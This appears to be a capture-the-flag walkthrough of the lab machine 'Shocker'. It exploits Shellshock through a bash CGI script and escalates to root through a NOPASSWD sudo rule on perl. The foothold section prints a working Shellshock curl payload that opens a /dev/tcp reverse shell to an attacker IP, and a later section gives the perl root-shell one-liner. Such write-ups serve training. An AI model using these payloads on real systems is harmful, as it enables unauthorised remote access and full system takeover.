Shocker

Overview

Shocker is an easy Linux machine that demonstrates the Shellshock vulnerability (CVE-2014-6271) against an Apache server with CGI scripting enabled. Enumerating /cgi-bin/ with gobuster surfaces a bash-based CGI script; injecting the Shellshock payload into the User-Agent HTTP header executes arbitrary commands on the unpatched server, landing a reverse shell as shelly. From there a sudo rule granting NOPASSWD access to /usr/bin/perl provides an instant root shell via a GTFOBins one-liner.

Machine Matrix

The CVE axis dominates — Shellshock (CVE-2014-6271) is one of the most well-known weaponized web vulnerabilities — and the Real-Life score reflects that both CGI-exposed bash scripts and over-permissive sudo rules are routinely found on real production systems.

Recon

Port	Service	Notes
80/tcp	Apache httpd 2.4.18	Ubuntu; CGI enabled
2222/tcp	OpenSSH 7.2p2	Ubuntu 4ubuntu2.2

nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p80,2222 -sC -sV -Pn 10.10.10.X

The two open ports are HTTP on 80 and SSH on a non-standard port 2222. The web server banner identifies Apache 2.4.18 on Ubuntu — and knowing that CGI-capable Apache installations may expose /cgi-bin/ is the key lead to follow.

Enumeration

Confirm that /cgi-bin/ exists — a 403 means the directory is present but not browseable:

curl -s -o /dev/null -w "%{http_code}" http://10.10.10.X/cgi-bin/

Fuzz inside it for CGI scripts with common extensions:

gobuster dir -u http://10.10.10.X/cgi-bin/ \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x sh,cgi,pl,py -t 50

Gobuster returns http://10.10.10.X/cgi-bin/user.sh with a 200 status. Confirm the server runs it as a bash CGI script:

curl -s http://10.10.10.X/cgi-bin/user.sh

The response is a shell script that reports uptime — this is live CGI execution under bash. Verify that the running Bash version is vulnerable to Shellshock using the nmap script:

nmap -sV -p80 --script http-shellshock \
  --script-args uri=/cgi-bin/user.sh,cmd=id 10.10.10.X

The nmap script confirms CVE-2014-6271 is exploitable and returns the id output — the box is vulnerable to OS command injection via improper initialization of environment variables.

Foothold

GNU Bash prior to version 4.3 patch 25 incorrectly executes code that trails a function definition when importing environment variables. Apache passes HTTP headers as environment variables to CGI processes, so any header the attacker controls — including User-Agent — reaches the CGI script’s bash environment. The payload () { :;}; <command> is parsed as a function definition followed by arbitrary code; the code after } runs before the script even starts.

Start a listener:

nc -lvnp 9999

Fire the Shellshock reverse shell by placing the payload in the User-Agent header:

curl -s "http://10.10.10.X/cgi-bin/user.sh" \
  -H 'User-Agent: () { :;}; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.X/9999 0>&1"'

The listener catches a shell as shelly (uid=1000).

User flag

cat /home/shelly/user.txt   # HTB{...}

The foothold lands directly as shelly, who owns user.txt — no lateral movement required.

Privilege Escalation

Check what shelly can run with sudo:

sudo -l

The output shows:

(root) NOPASSWD: /usr/bin/perl

shelly can run the Perl interpreter as root without supplying a password. Perl’s exec() replaces the current process with any given command — since sudo has already elevated the process to root, spawning /bin/bash yields a root shell. This is a privilege mismanagement finding: granting sudo access to any scripting language interpreter is functionally equivalent to granting unrestricted root access.

Exploit with the GTFOBins one-liner:

sudo perl -e 'exec "/bin/bash"'

The prompt becomes root (uid=0(root)).

Root flag

cat /root/root.txt   # HTB{...}

Full compromise — Shellshock via CGI for the foothold and a NOPASSWD sudo interpreter escape for root.